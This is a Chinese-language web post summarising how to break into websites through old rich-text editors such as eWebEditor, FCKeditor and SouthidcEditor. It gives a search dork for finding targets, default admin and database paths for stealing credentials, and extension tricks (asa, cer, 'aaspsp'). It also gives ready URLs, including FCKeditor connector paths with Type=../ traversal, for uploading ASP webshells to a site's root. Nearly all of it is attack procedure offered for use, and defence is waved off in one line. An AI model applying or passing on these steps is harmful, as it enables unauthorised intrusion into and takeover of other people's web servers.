编辑器漏洞总结

编辑器漏洞总结

2023年7月14日发(作者:)

site:editor inurl:asp?id inurl:ewebeditornet

比如常见的编辑器漏洞有:

ewebeditor

ewebeditornet

fckeditor

editor

southidceditor

SouthidcEditor

bigcneditor

一:ewebeditor为例

1:默认下载下来的后台:

/ewebeditor/admin_

后台如果能进入:

可点击样式管理:

standard 拷贝一份(直接修改改不了)

在拷贝的一份里加入图片类型( asa aaspsp ) 然后点预览

在编辑器里点设计然后直接上传asa大马.

上传后在代码里可以看到马的位置!

(原理:因为在iis里网站的属性里应用程序配置一项 asa扩展名还是用来解析的,asp也是还有 cer cdx )

在cer cdx asa的被删掉那么马儿就找不到映射不过去.

可以在拷贝过后的样式图片类型里加入 aaspsp 然后在上传直接就可以上传asp文件

2:下载默认数据库

/ewebeditor/db/ 然后分析数据库

webeditor_system(1) 就可以看到用户名和密码如果破解不出来

可以在webeditor_style(14 样式表里

主要看允许上传文件的扩展名(s-fileext s_ingeext)

看到一个小黑客曾经搞过多了asa aaspsp

可以用他来利用!(后台找不到的情况下也可以用此方法)

可以构造语句:

比如 ID=46 s-name =standard1

构造代码: ?id=content&style=standard

ID和和样式名改过后

?id=46&style=standard1

然后就是进入编辑器上传asa 或者asp的得到webshell

二:ewebeditornet 漏洞利用

默认上传地址:

/ewebeditornet/

可以直接上传一个cer的木马

在无法上传的情况下

可以地址栏构造以下代码: javascript:();

然后查看源代码:

找到uploadsave 找到地址

默认传到uploadfile这个文件夹里 (漏洞修补: 可以在iss里直接把upload文件夹的执行权限选择无. )

三:fckeditor 漏洞利用

/fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=FileUpload&Type=Image&CurrentFolder=/

就把文件名字段改成NEWfile 选择文件名可定义

上传过后在/userfiles/image/找文件

四:southidceditor

/admin/southidceditor/datas/

/admin/southidceditor/

/admin/southidceditor/admin/admin_

五:bigcneditor

这个页不多说了

原理都差不多!

防范方法很简单就不多讲了,

FCKeditor上传漏洞,

/admin/FCKeditor/editor/filemanager/browser/default/?Type=all&Connector=connectors/asp/

打开这个地址就可以上传任何类型的文件了,马儿上传到的位置是:

/UserFiles/all/

"Type=all" 这个变量是自己定义的,在这里创建了all这个目录,而且新的目录没有上传文件格式的限制.

比如输入:

/admin/FCKeditor/editor/filemanager/browser/default/?Type=monyer&Connector=connectors/asp/

所传的文件就到了 /UserFiles/monyer/ 下了 而如果这样输入:/admin/FCKeditor/editor/filemanager/browser

/default/?Type=../&Connector=connectors/asp/

就可以传到网站的根目录下,网站支持什么脚本,传什么脚本的马就可以了.

所传的文件就到了网站根目录下了

发布者:admin,转转请注明出处:http://www.yc00.com/news/1689306147a228345.html

相关推荐

发表回复

评论列表(0条)

  • 暂无评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件:admin@example.com

工作时间:周一至周五,9:30-18:30,节假日休息

关注微信